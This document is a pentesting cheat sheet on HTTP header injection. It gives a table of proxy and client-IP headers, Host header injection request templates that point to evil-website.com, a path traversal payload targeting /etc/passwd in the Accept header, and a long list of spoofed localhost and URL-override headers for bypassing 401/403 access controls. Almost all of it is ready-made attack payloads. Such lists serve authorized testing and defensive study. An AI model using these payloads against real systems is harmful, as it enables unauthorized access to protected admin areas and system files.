HTTP header injection

Main headers

Header	Purpose	Example
Client-IP	Client IP passed by proxy (non-standard)	Client-IP: 203.0.113.10
Connection	Controls connection behavior (hop-by-hop)	Connection: keep-alive
Contact	Service owner contact info (rare)	Contact: admin@example.com
Forwarded	Standard proxy/client info (RFC 7239)	Forwarded: for=203.0.113.10;proto=https;host=example.com
From	User email (mostly bots/crawlers)	From: crawler@example.com
Host	Target hostname of request	Host: example.com
Origin	Request origin (CORS / CSRF)	Origin: https://example.com
Referer	Source URL of request	Referer: https://example.com/login
True-Client-IP	Original client IP (Akamai)	True-Client-IP: 203.0.113.10
X-Client-IP	Client IP via proxy	X-Client-IP: 203.0.113.10
X-Custom-IP-Authorization	App-specific IP authorization	X-Custom-IP-Authorization: 203.0.113.10
X-Forward-For	Variant of X-Forwarded-For	X-Forward-For: 203.0.113.10
X-Forwarded-For	Original client IP chain	X-Forwarded-For: 203.0.113.10, 10.0.0.1
X-Forwarded-Host	Original Host header	X-Forwarded-Host: example.com
X-Forwarded-Server	Proxy/server hostname	X-Forwarded-Server: proxy01
X-Host	Alternate host value	X-Host: example.com
X-Original-URL	Original URL before rewrite	X-Original-URL: /admin
X-Originating-IP	Client IP (non-standard)	X-Originating-IP: 203.0.113.10
X-Real-IP	Client IP (common in Nginx)	X-Real-IP: 203.0.113.10
X-Remote-Addr	Client IP as seen by server	X-Remote-Addr: 203.0.113.10
X-Remote-IP	Client IP (non-standard)	X-Remote-IP: 203.0.113.10
X-Rewrite-URL	Internal URL rewriting	X-Rewrite-URL: /api/v1/users
X-Wap-Profile	Mobile device capabilities	X-Wap-Profile: http://wap.samsungmobile.com/uaprof/SM-G950.xml

Host Header injections

• Provide full path GET

  GET https://vulnerable-website.com/ HTTP/1.1
  Host: evil-website.com

• Add line wrapping

  GET /index.php HTTP/1.1
  Host: vulnerable-website.com
  Host: evil-website.com

• Repeat the same Host header 2 times

  Host: legit.com
  Stuff: stuff
  Host: evil.com

Bypass type limit

Accept: application/json, text/javascript, /; q=0.01 Accept: ../../../../../../../../../etc/passwd{{'

401/403 bypasses

Protocol downgrade

Try to change the HTTP version from HTTP/1.1 to HTTP/0.9 and remove the Host header.

HTTP header

If Whitelisted IP 127.0.0.1 or localhost.

Client-IP: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For: localhost
Forwarded: 127.0.0.1
Forwarded: localhost
True-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forward: 127.0.0.1
X-Forward: localhost
X-Forwarded-By: 127.0.0.1
X-Forwarded-By: localhost
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For-Original: localhost
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: localhost
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Server: localhost
X-Forwarded: 127.0.0.1
X-Forwarded: localhost
X-Forwared-Host: 127.0.0.1
X-Forwared-Host: localhost
X-Host: 127.0.0.1
X-Host: localhost
X-HTTP-Host-Override: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-Addr: localhost
X-Remote-IP: 127.0.0.1

Fake Origin

X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
Referer: /admin

Instead of /admin, try also with absoulte url https:/domain.com/admin

Method Override

X-HTTP-Method-Override: PUT

Wordlists

• https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers

• https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers